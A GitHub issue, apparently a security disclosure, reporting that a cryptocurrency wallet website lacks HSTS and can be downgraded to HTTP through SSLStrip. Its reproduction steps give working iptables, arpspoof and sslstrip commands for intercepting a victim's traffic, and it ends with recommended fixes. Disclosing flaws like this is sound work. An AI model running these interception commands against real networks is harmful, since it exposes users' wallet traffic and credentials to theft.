Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Wallet Webserver is Vulnerable to MiTM #2

Open
ngpentest007 opened this issue Jul 25, 2019 · 0 comments
Open

Wallet Webserver is Vulnerable to MiTM #2

ngpentest007 opened this issue Jul 25, 2019 · 0 comments

Comments

@ngpentest007
Copy link

Vulnerability: Application Vulnerable to MiTM Attack/SSLStrip Attack (Hacking HTTPS)

Description: It was observed that the application is vulnerable to a MiTM (Man in The Middle) Attack. This means an attacker can intercept the connection between a web browser and a trusted website by forcing the website to load without utilizing SSL/TLS.

Vulnerable Application: Wallet Webserver https://www.myfusionwallet.com/

Severity: High

Steps to Reproduce:
1- Enter the below command in a Linux command prompt: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2- Now use the below command to enable forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
3- Now use arpspoofing for the target victim: arpspoof -i eth0 -t victim ip gateway ip
4- You should now see that arpsoof is running. Now in a separate terminal window type the following command: sslstrip -l 8080
5- When the victim tries to access myfusionwallet.com it will load over HTTP.

Or

check the HSTS Presence in the response header.

Impact: An attacker can force the application to utilize HTTP. Once the application is over HTTP then an attacker can sniff the communication.

Fix: The following are recommendations to protect against SSLStrip and similar attacks:

Screenshot: Shows application is accessible over HTTP
Application loading over HTTP- Firefox

1- Enable HSTS
2- Enable HTTPS throughout the website

Attack Reference: Reference link to understand more about this issue:
https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant